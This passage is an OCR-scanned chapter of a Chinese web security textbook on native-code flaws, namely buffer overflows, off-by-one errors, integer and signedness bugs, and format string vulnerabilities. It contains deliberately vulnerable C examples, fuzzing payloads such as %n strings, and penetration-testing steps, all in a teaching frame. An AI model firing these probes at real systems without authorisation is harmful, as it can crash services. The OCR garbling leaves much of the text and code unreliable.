种 本 地 代码 。 其 他 可 能 的 目标 包含 : 任何 其 名 称 〈 如 dl 或 exe) 表示 它 
使 用 了 本 地 代码 的 页 面 或 脚本 ， 以 及 任何 已 知 调用 遗留 外 部 组 件 的 功 
能 《如 日 志 机 制 ) 。 如 果 认 为 所 攻击 的 应 用 程序 包含 大 量 的 本 地 代 
码 ， 那 么 就 有 必要 对 应 用 程序 处 理 的 每 个 用 户 提交 的 数据 进行 测试 ， 
包括 每 个 参数 的 名 称 与 参数 值 、cookie、 请 求 消 息 头 及 其 他 数据 。 

本 章 主 要 介绍 3 种 典型 的 软件 漏洞 : FDR Yet Os RANT AL AG Sh 
化 字符 串 漏 洞 。 对 每 一 种 情况 ， 我 们 将 首先 描述 一 些 常 见 的 漏洞 ， 然 
后 说 明 在 Web 应 用 程序 中 换 碍 这 些 漏洞 所 需 采 取 的 实际 步 又。 这 个 主 
题 涉及 的 内 容 非 常 广 ， 它 不 在 本 书 讨论 的 范围 之 内 。 关 于 本 地 软件 漏 
洞 ， 要 想 了 解 更 多 详细 信息 及 如 何 发 现 它们 ， 我 们 推荐 以 下 参考 书 。 

O The Shellcoder's Handbook, 2nd Edition, by Chris Anley, John 
Heasman, Felix Linder, and Gerardo Richarte (Wiley, 2007) 

O The Art of Software Security Assessment by Mark Dowd, John 
McDonald, and Justin Schuh(Addison-Wesley, 2006) 


口 Cray Hat Hacking, 2nd Edition, by Shon Harris, Allen Harper, Chris 
Eagle, and Jonathan Ness(McGraw-Hill Osborne, 2008) 


注解 ”本 章 描述 的 漏洞 远程 探查 可 能 会 给 应 用 程序 带 来 严 


重 的 拒绝 服务 风险 o 与 验证 机 制 不 完善 及 路 径 志 历 等 漏洞 不 同 ， 仪 
查找 各 种 典型 的 软件 漏洞 也 可 能 会 在 目标 应 用 程序 中 造成 无 法 处 理 


的 异常 ， 导 致 应 用 程序 终止 运行 。 如 果 准 备 在 一 个 现 有 的 应 用 程序 
中 探查 这 些 漏洞 ， 在 开始 测试 前 ， 必 须 确保 应 用 程序 所 有 者 接 受 测 
试 带 来 的 风险 。 


如 果 应 用 程序 将 用 户 可 控制 的 数据 复制 到 一 个 不 足以 容纳 它们 的 
内 存 缓存 区 中 ， 就 会 出 现 缓冲 区 溢出 漏洞 。 由 于 目标 缓冲 区 溢出 ， 导 
致 邻近 的 内 存 被 用 户 数据 重 写 。 攻 击 者 可 以 根据 漏洞 的 特点 利用 它 在 
服务 器 上 运行 任意 代码 或 执行 其 他 未 授权 操作 。 多 年 来 ， 缓 冲 区 溢出 
训 酒 _ 直 在 本 地 钦 件 中 普 记 存在 ， 并 恋 视 为 不 地 软件 开发 者 必须 中 名 
9 头号 公敌 "。 


16.1.1 RAH 


如 有 条 应 用 程序 在 未 确定 大 小 固定 的 缓冲 区 容量 足够 大 之 前 ， 束 使 
用 一 个 无 限制 的 复制 操作 (如 C 语 言 中 的 strcpy) 将 一 个 大 小 可 变 的 组 
冲 区 复制 到 男 一 个 大 小 国定 的 缓冲 区 中 ， 往 往 就 会 造成 组 促 区 淤 出 。 
例如 ， 下 面 的 函数 将 字符 串 username 复 制 到 一 个 分 配 到 栈 上 的 大 小 固 
定 的 缓冲 区 中 : 


bool CheckLogin(char* username, char* password) 


{ 


char _username[32]; 


strcpy({_username, username) ; 


如 果 字 人 符 串 username 超 过 32 个 字符 ，_username 缓 冲 区 就 会 海 出 ， 
攻击 者 将 重 写 邻 近 内 存 中 的 数据 。 

在 成 功利 用 栈 缓冲 区 海 出 漏洞 的 攻击 中 ， 攻 击 者 通常 能 够 重 写 栈 
上 已 保存 的 返回 地 址 。 当 调用 CheckLogin 函 数 时 ， 处 理 器 将 调用 函数 
后 执行 的 指令 地 址 写 入 栈 。 结 束 CheckLogin 函 数 后 ， 处 理 器 从 栈 中 取 
出 这 个 地 址 ， 返 回执 行 这 个 指令 。 同 时 ，CheckLogin 函 数 分 配 到 栈 上 
已 保存 的 返回 地 址 著 边 的 _username 绥 神 区 。 如 果 攻 击 者 能 够 令 
_username 绥 冲 区 洲 出 ， 他 束 能 用 他 选择 的 一 个 值 重 写 缓冲 区 已 保存 的 
返回 地 址 ， 让 处 理 絮 访问 这 个 地 址 ， 从 而 执行 任意 代码 。 


16.1.2 HREH 


从 本 质 上 讲 ， 堆 缓冲 区 淤 出 也 是 由 前 面 描述 的 相同 危险 操作 造成 
的 ， 唯 一 的 不 同 在 于 这 时 盗 出 的 目标 缓冲 区 分 配 在 堆 上 ， 而 不 是 在 栈 
E: 


bool CheckLogin(char* username, char* password) 


char* _username = (char*) malloc(32); 


strcpy(_username, username); 


iS, ERIKA, HERR oe Ne Be E 
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形式 执行 : 在 内 存 中 ， 每 个 块 的 前 面 是 一 个 控制 结构 ， 其 中 包含 块 的 
大 小 、 一 个 指 同 堆 上 前 一 个 块 的 指针 以 及 一 个 指 同 堆 上 后 一 个 块 的 指 
针 。 当 堆 缓冲 区 海 出 时 ， 邻 近 的 堆 块 的 控制 结构 被 用 户 控制 的 数据 重 


与 栈 盗 出 漏洞 相 比 ， 利 用 这 种 漏洞 实施 攻击 要 更 困难 一 些 ， 但 
征 ， 一 种 利 见 的 利用 方法 是 在 被 重 写 的 扒 控 制 结 构 中 写 入 专门 设计 的 
值 ， 以 在 将 来 某 个 时 间 重 写 任何 一 个 关键 的 指针 。 探 制 结构 已 被 重 写 
的 堆 块 从 内 存 中 释放 后 ， 堆 管理 侣 需要 更 新 堆 块 的 链接 表 。 要 完成 这 
项 任务 ， 它 需要 更 新 后 一 个 堆 块 的 反 向 链接 指针 ， 并 更 新 前 一 个 堆 块 
的 正 疝 链接 指针 ， 以 便 链 接 表 中 的 这 两 个 指针 指 疝 彼此 。 为 此 ， 堆 管 
理 右 使 用 被 重 写 的 控制 结构 中 的 值 。 具 体 来 说 ， 为 更 新 后 一 个 块 的 反 
癌 链接 指针 ， 堆 管理 右 废 弃 被 重 写 的 控制 结构 中 的 正 同 链接 指针 ， 并 
在 这 个 地 址 的 结构 中 写 入 被 重 写 的 控制 结构 中 的 反问 链接 指针 的 值 。 
换 句 话说 ， 它 在 一 个 用 户 控制 的 地 址 中 写 入 一 个 用 户 控制 的 值 。 如 果 
攻击 者 精心 设计 了 他 的 洲 出 数据 ， 他 整 能 用 他 选择 的 值 重 写 内 存 中 的 
任何 指针 ， 其 目的 是 控制 指针 的 执行 路 径 ， 从 而 执行 任意 代码 。 通 
常 ， 指 针 重 写 的 主要 目标 是 随后 说 应 用 程序 调用 的 函数 指针 的 值 ， 或 
者 是 在 下 次 出 现 异 第 时 被 调用 的 异 肖 处 理 絮 的 地 址 。 


T 注解 最 新 的 编译 器 与 操作 系统 已 经 采取 了 各 种 措施 对 软 


件 进 行 保护 ， 防 止 编程 错误 导致 缓冲 区 溢出 。 这 表示 ， 如 今 现实 世 
界 中 的 溢出 漏洞 往往 比 这 里 描述 的 示例 更 难以 利用 。 要 想 了 解 更 多 


有 关 这 些 漏洞 的 防御 措施 及 避 开 它们 的 方法 ， 请 参阅 Te 
Shellcoder's Handbook 一 书 。 


如 采编 程 错误 使 得 攻击 着 可 以 在 一 个 被 分 配 的 缓冲 区 之 后 写 入 一 
SED (BRULEE) ， 就 会 发 生 一 种 特殊 的 溢出 漏洞 。 

以 下 面 的 代码 为 例 ， 它 在 栈 上 分 配 一 个 缓 促 区 ， 执 行 一 项 计数 组 
冲 区 复制 操作 ， 然 后 以 空 字 市 结束 目标 字符 串 : 


bool CheckLogin(char* username, char* password) 


f 
4 
t 


char _username[32]; 


int i; 

for (i = 0; username[i] && i < 32; i++) 
_username[i] = username[i]; 

_username[i] = 0; 


这 上 段 代 码 复 制 32 B， 然 后 增加 空 终止 符 。 因 此 ， 如 果 用 户 名 为 32 
B 或 更 长 ， 空 字 市 就 会 写 在 缕 冲 区 之 外 ，“ 污 染 ” 邻 近 的 内 存 。 这 种 条 
件 可 被 攻击 者 加 以 利用 : 如 果 栈 上 邻近 的 数据 是 调用 帧 (calling 
frame) 的 已 保存 的 帧 指针 (saved frame pointer) ， 那 么 将 低位 字 节 设 
为 零 可 能 会 导致 它 指 疝 _username 缕 冲 区 ， 因 而 指 癌 攻 击 者 控制 的 数 
据 。 当 调用 的 函数 返回 时 ， 攻 击 者 就 可 以 控制 执行 流程 。 

如 果 开 发 者 忽略 在 字符 串 绥 冲 区 中 为 一 个 空 字 届 终止 人 符 预 留 空 
间 ， 这 时 也 会 出 现 一 种 与 上 面 的 漏洞 类 似 的 漏洞 。 下 面 以 前 面 堆 淤 出 
漏洞 的 “修复 ”代码 为 例 : 


bool CheckLogin(char* username, char* password) 
{ 
char* _username = {char*)} malloc({32); 


strncpy(_username, username, 32); 


在 这 段 代码 中 ， 程 序 员 在 堆 上 建立 一 个 固定 大 小 的 缓冲 区 ， 然 后 
执行 一 个 计数 缓冲 区 复制 操作 ， 虽 在 确保 缓冲 区 不 会 淤 出 。 然 而 ， 如 


果 用 户 名 比 缓冲 区 更 长 ， 那 么 缓冲 区 内 就 会 完全 填充 用 户 名 中 的 字 
符 ， 再 没有 空间 在 最 后 附加 一 个 空 字 节 。 因 此 ， 复 制 到 缓冲 区 中 的 字 
符 串 就 会 “丢失 ” 它 的 空 终止 符 。 

一 些 语言 (如 C) 并 不 单独 记录 一 个 字符 串 的 长 度 ， 字 符 串 结束 
部 分 用 一 个 空 字 节 表示 (也 就 是 说 ， 用 零 的 ASCII 字 符 编码 表示 ) 。 
如 果 一 个 字符 串 “ 丢 失 ” 了 它 的 空 终止 符 ， 它 的 长 度 就 会 增加 ， 并 一 直 
BIA BSE (ERNE) 结束 。 这 种 无 意 的 结果 经 常会 在 
应 用 程序 中 造成 反常 行为 与 漏洞 。 

我 们 曾 在 一 个 硬件 设备 的 web 应 用 程序 中 发 现 这 种 漏洞 。 该 应 用 
程序 包含 一 个 页 面 ， 它 接受 POST 请 求 的 任意 参数 ， 并 返回 HTML 表 
单 ， 其 中 以 隐藏 字段 的 形式 包含 那些 参数 的 名 称 与 参数 值 。 例 如 : 


az} 
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Content-Type: text/htm 
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<htm] 

<heac 

<meta http fe"content-type”" content="text/html;charset=iso 59 
head 

<form name="FORM RELAY action="page.cgi" methcd="POST*> 

<input type="hidden” name="a" value="b"> 

</form> 


‘body onLoad="document . FORM_RELAY . submit {);"> 


<i body> 


</ntml> 


因为 茶 种 原因 ， 人 整个 应 用 程序 都 需要 使 用 这 个 页 面 处 理 各 种 用 户 
输入 ， 其 中 许多 为 敏感 数据 。 然 而 ， 如 有 果 用 户 提 区 的 数据 等 于 或 超过 
4096 B， 那 么 返回 的 表单 中 还 包括 在 向 页 面 提出 的 前 一 个 请 求 中 提交 
的 参数 ， 即 使 这 些 参数 由 另外 一 名 用 户 提交 。 例 如 : 


<html> 
nead> 
<meta http-equiv="content-type” content=*text/html; charset-iso-8859-1"> 
ead> 
<form name=""ORM_RELAY* acticn="*page.cgi® method="POST"> 
<input type="hidden" name="a" value-"bbbbbbbbbbbbb[ lots more b‘s]"> 


<input type="hidden" name-"strUsername" valuet"aqriffiths*"> 


<input type="hidden" name="strPassword" value="aulfwiadersechen"> 
input type="hidd a ji lu I n 
form 
dy Load="document . FORM_RELAY.submit{});"> 
ody 


tml> 
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长 的 数据 ， 解 析 收 到 的 啊 应 ， 记 录 其 他 用 户 提交 给 页 面 的 每 一 个 数 
据 ， 包 括 登 录 证 书 和 其 他 敏感 信息 。 

造成 这 种 漏洞 的 根本 原因 是 ， 在 4096 B 的 内 存 块 中 ， 用 户 提 交 的 
数据 被 保存 为 以 空子 节 终 止 的 字符 串 。 这 些 数据 被 复制 到 一 个 检验 操 
作 中 ， 因 此 不 会 直接 造成 溢出 。 然 而 ， 如 采 提 区 的 是 超 长 的 输入 ， 复 
制 操作 束 会 导致 空 终止 人 符 “ 丢 失 ”， 因 而 字符 串 会 “流入 ”到 内 存 邻 近 的 
数据 中 。 因 此 ， 当 应 用 程序 解析 请 求 参数 时 ， 它 会 一 直 解 析 到 下 一 个 
空 字 市 为 止 ， 因 此 束 会 解析 出 其 他 用 户 提 交 的 参数 。 


癌 一 个 确定 的 目标 发 送 较 长 的 字符 串 并 监控 反常 结果 是 查找 绥 促 
区 洲 出 漏洞 的 基本 方法 。 有 些 时 候 ， 一 些 细微 的 漏洞 只 有 通过 发 送 一 
个 特殊 长 度 或 者 在 较 小 的 长 度 范围 内 的 超 长 字符 串 才 能 检测 出 来 。 但 
征 ， 许 多 时 候 ， 只 需 癌 应 用 程序 发 送 一 个 超出 其 预计 长 度 的 字符 串 ， 
就 可 以 探查 出 漏洞 。 

程序 员 常 常 使 用 十 进 制 或 十 六 进 制 的 约 整 数 (如 32、100、1024、 
4096 等 ) 来 创建 固定 大 小 的 缓冲 区 。 在 应 用 程序 中 探查 明显 漏洞 的 一 


个 简单 方法 就 是 ， 向 确定 的 每 一 个 目标 数据 发 送 超 长 字符 串 ， 然 后 监 
挥 服务器 对 反常 输入 的 啊 应 。 


渗透 测试 步骤 


(1) 向 每 一 个 目标 数据 提交 一 系列 稍 大 于 常用 缓冲 区 大 小 的 
长 字符 串 。 例 如 

1100 

4200 

33000 


(2) 一 次 针对 一 个 数据 实施 攻击 ， 最 大 程度 地 禾 盖 应 用 程序 
中 的 所 有 代码 路 径 。 

(3) 可 以 使 用 Burp Intruder 中 的 字符 块 有 效 载 集 来 源 自动 生 
成 各 种 大 小 的 有 效 载体 。 

(4) 监控 应 用 程序 的 响应 ， 确 定 所 有 反常 现象 。 无 法 控制 的 
洲 出 几乎 可 以 肯定 会 在 应 用 程序 中 引起 异常 。 在 远程 进程 中 探测 何 
时 出 现 这 种 异常 相当 困难 ， 需 要 寻找 的 反常 现象 包括 以 下 几 项 。 
口 HTTP 500 状 态 码 或 错误 消息 ， 这 时 其 他 畸形 (而 非 超 长 ; 输 
入 不 会 产生 相同 的 结果 。 
口内 容 详细 的 消息 ， 表 示 某 个 本 地 代码 组 件 发 生 故 障 。 
口服 务 絮 收 到 一 个 局 部 或 畸形 响应 。 
口服 务 絮 的 TCP 连接 未 返回 响应 ， 突 然 天 闭 。 
口 整个 web 应 用 程序 停止 啊 应 。 

(5) 注意 ， 如 果 一 个 堆 洲 出 被 触发 ， 这 可 能 会 在 将 来 而 非 立 

即 导 致 系 统 骨 浇 。 因 此 ， 必 须 进行 实验 ， 确 定 一 种 或 几 种 造成 
堆 “ 府 化 ”的 测试 字符 串 。 

(6) “一 位 偏 移 ” 漏 洞 可 能 不 会 造成 系统 毅 泪 ， 但 可 能 会 导致 反 
党 行为 ， 如 应 用 程序 返回 意外 的 数据 。 


有 些 时 候 ， 测 试 字符 串 可 能 会 被 应 用 程序 自身 或 其 他 组 件 (如 
Web 服 务 器 ) 实施 的 输入 确认 检查 所 阻止 。 在 URL 查 询 字 符 串 中 提交 
超 长 数据 时 通常 会 出 现 这 种 情况 ， 应 用 程序 会 在 针对 每 个 测试 字符 串 
的 响应 中 以 “URL 过 长 ”之 类 的 常规 消息 反映 这 一 点 。 在 这 种 情况 下 ， 
应 当 进行 实验 ， 确 定 URL 人 允许 的 最 大 长 度 (一 般 约 为 2000 个 字符 ) ， 


并 调整 缓冲 区 大 小 ， 以 使 测试 字符 串 符 合 这 个 要 求 。 但 是 ， 即 使 实施 
了 篆 规 过 滤 ， 洲 出 可 能 依然 存在 ， 因 为 长 度 足 够 短 、 能 够 避 开 这 种 过 
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其 他 情况 下 ， 过 滤 机 制 可 能 会 限制 在 一 个 特定 参数 中 提交 的 数据 
类 型 或 字符 了 犯 围 。 例 如 ， 当 将 提交 的 用 户 名 传送 给 一 个 包含 溢出 漏洞 
的 功能 时 ， 应 用 程序 可 能 会 确认 该 用 户 名 是 否 仅 包含 字母 数字 字符 。 
为 实现 测试 效率 最 大 化 ， 渗 透 测试 员 应 当 设 法 确保 每 个 测试 字符 串 仅 
包含 相关 参数 允许 的 字符 。 满 足 这 种 要 求 的 一 个 有 效 方法 生 ， 和 截获 一 
个 包含 应 用 程序 所 接受 的 数据 的 正 弟 请求 ， 然 后 使 用 其 中 已 经 包含 的 
相同 类 型 的 字符 ， 创 建 一 个 可 能 通过 任何 基于 内 容 的 过 滤 的 长 字符 
早 ， 再 使 用 这 个 字符 串 轮 流 测 试 每 一 个 目标 参数 。 

即使 确信 应 用 程序 中 存在 缓冲 区 淤 出 漏洞 ， 但 是 ， 要 远程 利用 它 
执行 任意 代码 仍然 极其 困难 。NGSSoftware 公 司 的 Peter Winter-Smith 就 
冒 日 缓 冲 区 淤 出 利用 的 可 能 性 进行 了 一 些 有 趣 的 研究 。 欲 知 详情 ， 请 
参阅 以 下 内 容 : 
www.ngssoftware.com/papers/NISR.BlindExploitation.pdf ° 


如 果 应 用 程序 在 执行 某 种 缓冲 区 操作 前 对 一 个 长 度 值 运用 某 种 算 
法 ， 但 却 没有 考虑 到 编译 器 与 处 理 器 整数 计算 方面 的 一 些 特点 ， 往 往 
就 会 出 现 与 整数 有 关 的 漏洞 。 有 两 种 类 型 的 漏洞 最 值得 关注 : BBC 
出 与 符号 错误 。 
16.2.1 整数 溢出 

当 对 一 个 整数 值 进行 操作 时 ， 如 果 整 数 大 于 它 的 最 大 可 能 值 或 小 
于 它 的 最 小 可 能 值 ， 就 会 造成 整数 溢出 漏洞 。 这 时 ， 数 字 束 会 “ 回 
绕 "， 使 一 个 非常 大 的 数字 变 得 非常 小 ， 或 者 与 之 相反 。 

下 面 以 前 面 堆 淤 出 漏洞 的 “修复 ”代码 为 例 : 


bool CheckLogin(char* username, char* password) 
i 


unsigned short len = strlen(username) + 1; 
char* _username = {char*) malloc{len); 
strcpy (_username, username); 


在 这 段 代 码 中 ， 应 用 程序 求 出 用 户 提 交 的 用 户 名 的 长 度 ， 增 加 一 
个 长 度 安置 字符 串 最 后 的 空 字 节 ， 再 给 它 分 配 一 个 相应 长 度 的 缓冲 
区 ， 然 后 将 用 户 名 复制 到 这 个 缓冲 区 内 。 如 果 使 用 正常 长 度 的 输入 ， 
这 段 代码 就 能 够 正常 运行 。 但 是 ， 如 果 用 户 提 交 一 个 65 535 个 字符 的 
用 户 名 ， 就 会 造成 整数 溢出 。 一 个 长 度 较 短 的 整数 包含 16 位 ， 它 足以 
保存 0~65 535 之 间 的 值 。 如 果 提 交 一 个 长 度 为 65 535 的 字符 串 ， 程 序 
会 在 这 个 字符 串 后 面 增加 一 个 长 度 ， 使 得 这 个 值 “ 回 绕 ” 而 变 为 0。 于 是 
应 用 程序 为 它 分 配 一 个 长 度 为 0 的 缓冲 区 ， 把 用 户 名 复制 到 它 里 面 ， 
而 造成 堆 溢 出 。 这 样 ， 即 使 程序 员 试图 确保 目标 缓冲 区 足够 大 ， 攻 击 
者 仍然 能 够 制造 溢出 。 


16.2.2 符号 错误 


如 有 果 应 用 程序 使 用 有 符号 和 无 符号 的 整数 来 表示 绥 冲 区 的 长 度 ， 
并 且 在 某 个 地 方 混 清 这 两 个 整数 ， 或 者 将 一 个 有 符号 的 值 与 无 符号 的 
值 进行 直接 比较 ， 或 者 向 一 个 仅 接 受 无 符号 的 值 的 钞 数 参数 提交 有 符 
号 的 值 ， 都 会 出 现 符 号 错误 。 在 上 壕 两 种 情况 下 ， 有 符号 的 值 都 会 被 
当做 其 允 应 的 无 符号 鸭 值 处 理 ， 也 融 是 访 ， 一 个 负数 变 成 一 个 天正 


数 
下 面 以 前 面 栈 溢出 漏洞 的 修复 “代码 ”为 例 ; 
bool CheckLogin(char* username, int len, char* password) 


{ 


char _username[32] = ""; 


iE {len < 32) 
strncpy(_username, username, len); 


EIRAB H, BLA pe Ca A 2 A TRAE REA 
符号 整数 为 参数 。 程 序 员 在 栈 上 建立 一 个 固定 大 小 的 缓冲 区 ， 检 查 用 
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如 有 果 ]en 参 数 为 人 负数， 这 上段 代 码 束 能 够 正 党 运行。 然而， 如果 攻 击 
者 能 够 问 范 数 提交 一 个 负 值 ， 那 么 程序 员 的 剑 护 性 检查 束 会 失效 。 仍 
然 可 以 成 功 将 它 与 32 进 行 比较 ， 因 为 编译 融会 把 这 两 个 数字 当做 有 符 
号 的 整数 处 理 。 因 此 ， 这 个 负 值 被 提交 给 stmcpy 画 数 ， 成 为 它 的 计数 
函数 。 因 为 strmcpy 仅 接受 无 符号 的 整数 为 参数 ， 所 以 编译 需 将 len 值 隐 
含 地 转换 成 这 种 类 型 ， 因 而 负 值 被 当做 一 个 大 的 正 数 处 理 。 如 采用 户 
提交 的 用 户 名 字符 串 长 度 大 于 32B， 那 么 缓冲 区 就 会 滚 出 ， 这 种 情况 
和 标准 栈 洲 出 类 似 。 

通 前 ， 实 施 这 种 攻击 必须 满足 一 个 前 所， 即 长 度 参 数 由 攻击 者 直 
接 控制 。 例 如 ， 它 由 客户 端 JavaScript 计 算 ， 并 在 请 求 中 将 它 所 属 的 字 
符 串 一 起 提交 。 但 是 ， 如 果 整 数 变 量 足 够 小 (例如 ， 非 常 短 ) ， 且 程 
序 在 服务 器 端 计算 它 的 长 度 ， 那 么 攻击 者 仍然 可 以 通过 同 应 用 程序 提 
区 一 个 超 长 的 字符 串 ， 借 由 整数 洲 出 引入 一 个 负 值 。 


目 然 地 ， 任 何 时 候 ， 只 要 客户 站 辣 服务 占 提 交 整 数值 ， 我 们 束 可 
以 在 这 些 位 置 探查 整数 漏洞 。 通 常 这 种 行为 发 生 在 以 下 两 种 不 同 的 情 


i Fe 

口 应 用 程序 通过 查询 字符 串 参 数 、cookie 或 消息 主体 ， 以 正常 形 
式 提交 整数 值 。 这 些 数 字 一 般 使 用 标准 的 ASCII 字符 ， 以 十 进 制 表 
7 o 表示 一 个 同样 被 提交 的 字符 串 长 度 的 字段 是 我 们 测试 的 主 

目标 。 

口 男 外 ， 应 用 程序 可 能 提交 棚 入 到 二 进 制 数 据 巨 对 象 中 的 整数 
值 。 这 些 数 据 可 能 源 目 一 个 客户 端 组 件 ， 如 ActiveX 探 件 ， 或 者 通过 客 
户 端 在 隐藏 表单 字段 或 cookie 中 传送 〈 请 参阅 第 5 章 了 解 相关 内 容 ) 。 
在 这 种 情况 下 ， 与 长 度 有 天 的 整数 漏洞 更 难以 发 现 。 它 们 一 般 以 十 六 
进 制 的 形式 表示 ， 通 党 出 现在 与 其 关联 的 字符 串 或 缓冲 区 之 前 。 请 注 
意 ， 上 述 二 进 制 数据 可 能 会 通过 Base64 或 类 似 的 方案 编码 ， 以 便于 通 
过 HTTP 传 送 。 


渗透 测试 步骤 


(1) 确定 测试 目标 后 ， 需 要 提交 适当 的 有 效 载 傈 ， 以 触发 任 
何 漏洞 。 轮 流 回 每 一 个 目标 数据 发 送 一 系列 不 同 的 值 ， 分 别 表示 不 
同 有 符号 与 无 符号 整数 值 的 边界 情况 。 例 如 : 
g 0x7f50x80 (127 与 128) 
DO0xff 与 0x100 (2555256) 
口 0x7ffff 与 0x8000 (32 767 与 32 768) 


口 0xffff 与 0x10000 (65 535 与 65 536) 
口 0x7fffffff 与 0x80000000 (2 147 483 647 与 2 147 483 648) 
口 0xffffffff 与 0x0 (4 294 967 295 与 0) 

(2) 如 果 被 修改 的 数据 以 十 六 进 制 表 示 ， 应 该 发 送 每 个 测试 
字符 串 的 little-endian 与 big-endian 版 本 菩 ， 例 如 ，ff7f 及 7fff。 如 果 十 
六 进 制 数字 以 ASCII 形 式 提 交 ， 应 该 使 用 应 用 程序 自身 使 用 的 字母 
字符 ， 确 保 这 些 字 符 被 正确 编码 。 

(3) 与 上 述 查 找 缓冲 区 溢出 漏洞 时 一 样 ， 应 该 监控 应 用 程序 
啊 应 中 出 现 的 反常 事件 。 


如 采用 户 可 控制 的 输入 被 当做 格式 化 字符 串 参 数 提交 给 一 个 接受 
可 能 被 滥用 的 格式 说 明 符 的 函数 (如 C 语 言 中 的 printf 系 列 函数 ) ， 就 
会 产生 格式 化 字符 串 漏 洞 。 这 些 函 数 接受 的 参数 数量 不 定 ， 其 中 可 能 
包 舍 不 同 的 数据 类 型 ， 如 数字 和 字符 串 。 提 交 给 函数 的 格式 化 字符 串 
中 包含 的 说 明 符 告 诉 函 数 : 变量 参数 中 应 包含 何 种 数据 ， 以 及 这 些 数 
据 以 什么 格式 表示 。 

例如 ， 下 面 的 代码 输出 一 条 包含 以 十 进 制 表 示 的 count 变 量 值 的 消 
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printf ("The value of count is $d", count.}; 
最 危险 的 格式 说 明 符 为 %n。 这 个 说 明 符 不 会 导致 什么 数据 被 打 
印 。 相 反 ， 它 使 已 经 输出 的 字 厄 数量 被 写 入 到 以 相关 变量 参数 提交 给 
函数 的 指针 地 址 中 。 例 如 : 


int count = 43; 


int written = 0; 
printf("The value of count is %$d%n.\n", count, é&written.); 
printf("%d bytes were printed.\n", written); 


它 输 出 : 


The value of count is 43. 
24 bytes were printed. 
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数 又 无 法 探查 到 这 一 点 ， 那 么 它 就 会 继续 处 理 调用 栈 中 的 参数 。 

如 果 攻 击 者 能 够 控制 提交 给 printf 之 类 函数 的 全 部 或 部 分 格式 化 字 
符 串 ， 他 就 可 以 利用 上 述 行 为 重 写 进程 内 存 的 重要 部 分 ， 并 最 终 执 行 
任意 代码 。 由 于 攻击 者 控制 着 格式 化 字符 串 ， 所 以 他 能 够 控制 钞 数 输 
出 的 字 市 数量 以 及 栈 上 说 输 入 的 字 市 数量 重 写 的 指针 。 这 样 ， 攻 击 者 
束 能 够 重 写 一 个 已 保存 的 返回 地 址 或 者 一 个 指向 异常 处 理 右 的 指针 ， 
进而 控制 代码 执行 ， 束 像 在 栈 海 出 中 一 样 。 


查找 格式 化 字符 串 漏洞 


在 远程 应 用 程序 中 探查 格式 化 字符 串 调 润 的 最 有 效 方法 是 ， 提 区 
包含 各 种 格式 说 明 符 的 数据 ， 并 监控 应 用 程序 的 任何 反常 行为 。 与 不 
受 控制 地 触发 缓冲 区 溢出 漏洞 可 能 造成 的 后 采 一 样 ， 在 一 个 易 受 攻击 
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渗透 测试 步骤 


(1) 轮流 向 每 个 目标 参数 提交 包含 大 量 格式 化 说 明 符 %n 与 %s 
的 字符 串 : 


SnsnFsnsnsnFsnFsnFnFsnSsnFsnFsnFsnFsnFsnFsnFsnFsnFnFn 


Ststststststststs 


O 


注意 ， 基 于 安全 考虑 ， 一 些 格式 化 字符 串 操 作 可 能 会 忽 


各 9%6n 说 


明 符 。 相 反 ， 提 交 9%s 说 明 符 将 会 使 画 数 废弃 栈 上 的 每 一 个 参数 ， 如 


果 应 用 程序 易于 受到 攻击 ， 就 可 能 会 导致 非法 访问 。 

(2) Windows FormatMessage 函 数 以 一 种 不 同 的 方式 使 用 printf 
系列 函数 中 的 说 明 符 。 为 测试 调用 这 个 函数 是 否 易于 受到 攻击 ， 应 
该 使 用 以 下 字符 串 : 


ELINIS2 In! F3In! $4 InIKSIn!S$G6tnsF7Fin!$Stn!F$G9tn!S10!n! ete 


S1isISZisl33sislita4islIS5islS6lsiS7islSSlsl!Z9isiSlOis! etc.. 


(3) 记得 将 % 字 符 URL 编 码 成 %25 。 
(4) 与 上 述 查 找 缓冲 区 溢出 漏洞 时 一 样 ， 应 该 监控 应 用 程序 
响应 中 出 现 的 反常 事件 。 


16.4 小结 


与 针对 Web 应 用 程序 的 攻击 相 比 ， 本 地 代码 中 的 软件 漏洞 造成 的 
威胁 相对 较 小 。 大 多 数 应 用 程序 在 托管 执行 环境 下 运行 ， 本 章 描述 的 
典型 软件 漏洞 并 不 会 发 生 。 然 而 ， 有 些 时 候 ， 这 类 漏洞 可 能 会 频 烷 发 
生 ， 并 影响 到 许多 在 硬件 设备 与 其 他 非 托 管 环境 下 运行 的 Web 应 用 程 
序 。 癌 服务 如 提交 一 组 特殊 的 测试 字符 串 并 监控 其 啊 应 ， 即 可 发 现 大 
多 数 软件 漏洞 。 

本 地 应 用 程序 中 的 一 些 漏洞 (如 本 章 描述 的 “一 位 偏 移 ” 漏 洞 ， 相 
对 较 易 被 攻击 者 利用 。 但 是 ， 许 多 时 候 ， 由 于 攻击 者 只 能 远程 访问 易 
受 攻击 的 应 用 程序 ， 利 用 它们 束 变 得 非常 困难 。 

与 得 找 大 多 数 其 他 类 型 的 Web 应 用 程序 漏洞 不 同 ， 如 果 应 用 程序 
易 受 攻击 ， 即 使 是 在 其 中 探查 典型 的 软件 漏洞 也 可 能 会 导致 拒绝 服务 
风险 。 因 此 ， 在 进行 这 种 测试 前 ， 必 须 确保 应 用 程序 所 有 者 接受 与 其 
相关 的 并 在 风险 。 


16.5 ”问题 


欲 知 问题 答案 ， 请 访问 http:/mdsec. net/wahh ° 

(1) 如 果 不 采 用 特殊 的 防御 措施 ， 为 什么 栈 绥 冲 区 淤 出 比 堆 洲 出 
更 容易 被 攻击 者 利用 ? 

(2) 在 C 与 C++ 语言 中 ， 字 符 串 的 长 度 如 何 决定 ? 

(3) 与 在 因特网 上 运行 的 所 有 权 Web 应 用 程序 中 存在 的 淤 出 漏洞 
We eae 

| 用? 

(4) 下 面 的 模糊 漏洞 字符 串 为 什么 无 法 确定 许多 格式 化 字符 串 漏 


一 
洞 ? 
S$ntntnsntnsn$ntnsn$nFr$nS$n$ntnsn$nsnsnstnsnsnsnsntnsn$ns$rsnFn. .. 


(5) 假设 在 一 个 大 量 使 用 本 地 代码 组 件 的 Web 应 用 程序 中 探查 缓 
冲 区 盗 出 漏洞 ， 发 现 了 某 个 请 求 的 一 个 参数 可 能 存在 漏洞 ， 然 而 无 法 
让 监控 到 的 反常 行为 再 次 发 生 。 有 时 ， 提 交 一 个 长 度 较 长 的 值 会 立即 
造成 系统 朋 种 ， 有 时 则 需要 重复 提交 儿 次 才能 导致 朋 涡 。 另 外 ， 如 有 宁 
是 交大 量 “ 展 性 ”请求 也 会 引起 系统 怖 省 。 
什么 原因 最 有 可 能 导致 应 用 程序 出 现 这 种 行为 ? 


